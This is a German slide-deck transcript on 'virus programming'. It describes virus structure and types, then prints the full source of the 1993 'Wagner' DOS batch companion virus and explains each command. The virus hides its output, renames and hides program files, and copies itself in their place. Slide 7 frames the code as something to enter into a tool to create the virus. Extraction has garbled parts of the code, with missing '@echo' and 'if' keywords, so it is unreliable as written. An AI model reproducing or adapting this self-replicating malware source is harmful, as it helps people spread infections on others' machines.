Die Präsentation wird geladen. Bitte warten

Die Präsentation wird geladen. Bitte warten

Vieren - Programmierung Im Jahre 1981 traten die ersten Viren auf, die noch sehr einfach gestrickt waren, und nicht sehr destruktiv waren. Mittlerweile.

Ähnliche Präsentationen


Präsentation zum Thema: "Vieren - Programmierung Im Jahre 1981 traten die ersten Viren auf, die noch sehr einfach gestrickt waren, und nicht sehr destruktiv waren. Mittlerweile."—  Präsentation transkript:

1

2 Vieren - Programmierung

3 Im Jahre 1981 traten die ersten Viren auf, die noch sehr einfach gestrickt waren, und nicht sehr destruktiv waren. Mittlerweile haben sich die Programmierer aber immer bessere Tricks ausgedacht, um den fiesen Antivirenprogrammen zu entgehen. Ein Virus ist eigentlich immer nach folgendem Schema aufgebaut: 1.) Infektionsroutine, die für die Vermehrung sorgt 2.) Aktivierung. Hier wird festgelegt, wann sich der Virus meldet 3.) Handlung. Was soll er tun, HD löschen, Grüße ausrichten...? Das Ziel eines Virus- Programmierers ist meist nicht Schaden anzurichten, sondern, dass sich sein Virus oder möglichst weit verbreitet.

4 Man unterscheidet folgende Virentypen: Dateiviren : Sie infizieren meistens COM oder EXE Dateien; überschreiben Teile des Programms oder hängen sich an dessen Ende und werden bei jedem Programmstart aktiv. Makroviren : Makroviren nutzen die Makrosprache von Excel und Word und starten automatisch beim öffnen einer infizierten Datei. Hoax Viren : Dies sind keine wirklichen Viren, aber Warnungen vor Phantasieviren. Diese Nachrichten werden gerne weiter versand, um auch Freunde vor dem nicht existierenden Virus zu waren und verbreiten sich teilweise recht stark.

5 Batch - Viren Batch Viren sind meist einfache Viren die es schon längere Zeit gibt. Auf der folgenden Folie wird der so genannte Wagner – Virus vorgestellt, der 1993 von „Black Wolf“ (Virenprogrammierer verwenden natürlich nicht ihren richtigen Namen) vorgestellt wurde.

6 Der Wagner – off ctty nul for %f in (*.exe *.com) do set A=%f if %A%==COMMAND.COM set A= rename %A% V%A% if not exist V%A% goto end attrib +h V%A% copy %0.bat %A% attrib +r %A% ren %A% *.bat set A= :end ctty exist V%0.com V%0.com %1 %2 exist V%0.exe V%0.exe %1 %2 %3

7 Die Befehle des Wagner – Virus 1 Diese ganzen sogenannten Programmier – Befehle werden in ein Programmier – Tool eingegeben und so das Virus erstellt. Auf den folgenden Folien werden die einzelnen Befehle erklärt und beschrieben, was sie auf dem infizierten Computer bewirken.

8 Die Befehle des Wagner – Virus off Dieser Befehl bewirkt, dass die Befehle des Programms beim ausführen nicht angezeigt werden. ctty nul Hier werden alle Ausgaben ins Nichts geleitet. So das der 'Benutzer' nicht sieht, dass Dateien kopiert wurden. for %f in (*.exe *.com) do set A=%f Hier werden alle EXE und COM Dateien und schreibt jede Datei in die Variable A. Das bedeutet, dass am Ende die letzte, noch nicht infizierte Datei in der Variable A gespeichert wird. if %A%==COMMAND.COM set A= Falls A die Datei Command.COM enthält, wird A Null gesetzt

9 Die Befehle des Wagner – Virus 3 rename %A% V%A% Die gefundene Datei wird umbenannt in Vname if not exist V%A% goto end Sollte das Umbenennen schiefgegangen sein, wird zur Stelle :end gesprungen und beendet attrib +h V%A% Die umbenannte Datei wird versteckt und somit nur durch Parameter mit dem Befehl dir /a:h sichtbar, außerdem wird sie bei einer erneuten Ausführung des Programms nicht noch einmal umbenannt. copy %0.bat %A% Der Virus (%0%) wird an die Stelle der COM Datei kopiert

10 Die Befehle Des Wagner – Virus 4 attrib +r %A% Nun wird die Datei vor dem Überschreiben geschützt ren %A% *.bat Nun noch eine Umbenennung in eine BAT Datei set A= Der Parameter A wird wieder geleert, um keine Spuren zu hinterlassen :end Hierher wird mit goto end gesprungen ctty con Die Ausgabe wird wieder auf den Bildschirm exist V%0.com V%0.com %1 %2 %3 Falls die Ersetzte Datei eine COM Datei war, wird diese nun exist V%0.exe V%0.exe %1 %2 %3 wie eben nur mit EXE Dateien

11

12


Herunterladen ppt "Vieren - Programmierung Im Jahre 1981 traten die ersten Viren auf, die noch sehr einfach gestrickt waren, und nicht sehr destruktiv waren. Mittlerweile."

Ähnliche Präsentationen


Google-Anzeigen